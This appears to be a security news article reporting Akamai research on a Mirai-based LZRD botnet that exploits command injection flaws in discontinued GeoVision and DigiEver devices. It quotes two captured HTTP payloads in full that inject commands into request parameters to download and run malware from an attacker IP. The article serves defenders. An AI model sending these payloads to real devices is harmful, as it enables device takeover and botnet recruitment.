Botnet Exploits Old GeoVision IoT Devices via CVE-2024-6047 & CVE-2024-11120

The Akamai Security Intelligence and Response Team (SIRT) has identified active exploitation of two command injection vulnerabilities — CVE-2024-6047 and CVE-2024-11120 — in discontinued GeoVision IoT devices. According to Akamai, this marks “the first reported active exploitation of these vulnerabilities since the initial disclosure in June 2024 and November 2024, respectively.”

The attackers are targeting the /DateSetting.cgi endpoint in vulnerable GeoVision devices, injecting malicious commands via the szSrvIpAddr parameter. These flaws enable unauthenticated remote attackers to execute arbitrary system commands.

Akamai explains: “Certain discontinued GeoVision devices fail to properly filter user input for this parameter, which allows unauthenticated remote attackers to inject and execute arbitrary system commands on a target system.”

Once exploited, the devices are forced to download and run a Mirai-based malware variant dubbed LZRD, sourced from a malicious URL:

/DateSetting.cgi dwTimeZone=2&dwGainType=0&szSrvIpAddr=time.windows.com;$(cd /tmp;wget http://176.65.144[.]253/hiddenbin/boatnet.arm7;chmod 777 boatnet.arm7;./boatnet.arm7 geovision;)&NTP_Update_time_hh=5&NTP_Update_time_mm=10&szDateM=2024/08/07&szTimeM=14:25:16&bDateFomat=0&bDateFormatMisc=0&dwIsDelay=1&Montype=0&submit=Apply

The payload execution string is tailored for ARM-based devices and is injected via a crafted HTTP POST request.

Upon execution, the malware prints a unique console string to the victim machine — a calling card of the LZRD variant. Akamai researchers also observed a series of attack functions consistent with Mirai’s lineage, including:

• sym.attack_method_tcp
• sym.attack_udp_plain
• sym.attack_method_ovh
• sym.attack_method_stdhex

Additionally, analysts discovered a hardcoded command-and-control (C2) IP address within the malware’s sym.resolve_cnc_addr() function. This infrastructure included banners eerily similar to those seen in past campaigns, notably the InfectedSlurs botnet.

The LZRD-powered botnet doesn’t stop at GeoVision devices. Akamai’s honeypots recorded attempts to exploit several other known vulnerabilities, including:

• A Hadoop YARN vulnerability
• CVE-2018-10561 (ZTE ZXV10 H108L Router)
• A DigiEver IoT flaw previously reported by Akamai

One such payload attempted to fetch and run a script from:

/cgi-bin/cgi_main.cgi

  cgiName=time_tzsetup.cgi&page=/cfg_system_time.htm&id=69&ntp=`curl --output wget.sh http://176.65.144[.]253/digi.sh; chmod 777 *; ./wget.sh`&ntp1=time.stdtime.gov.tw&ntp2=`curl --output wget.sh http://176.65.144[.]253/digi.sh; chmod 777 *; ./wget.sh`&isEnabled=0&timeDiff=+9&ntpAutoSync=1&ntpSyncMode=1&day=0&hour=0&min=0&syncDiff=30

To aid defenders, Akamai has included indicators of compromise (IOCs) in their full report and urges organizations to:

• Retire or isolate outdated IoT devices.
• Monitor network traffic for anomalous connections to known C2 IPs.
• Block known malicious endpoints, including hiddenbin/boatnet.arm7 and associated domains.

Related Posts:

• CVE-2024-11120 (CVSS 9.8): OS Command Injection Flaw in GeoVision Devices Actively Exploited, No Patch
• CVE-2024-6047 (CVSS 9.8): Urgent Security Risk for GeoVision Users
• Aquabotv3: The Mirai-Based Botnet Exploiting CVE-2024-41710 for DDoS Attacks
• GPT-4 Retiring: GPT-4o Takes Over in ChatGPT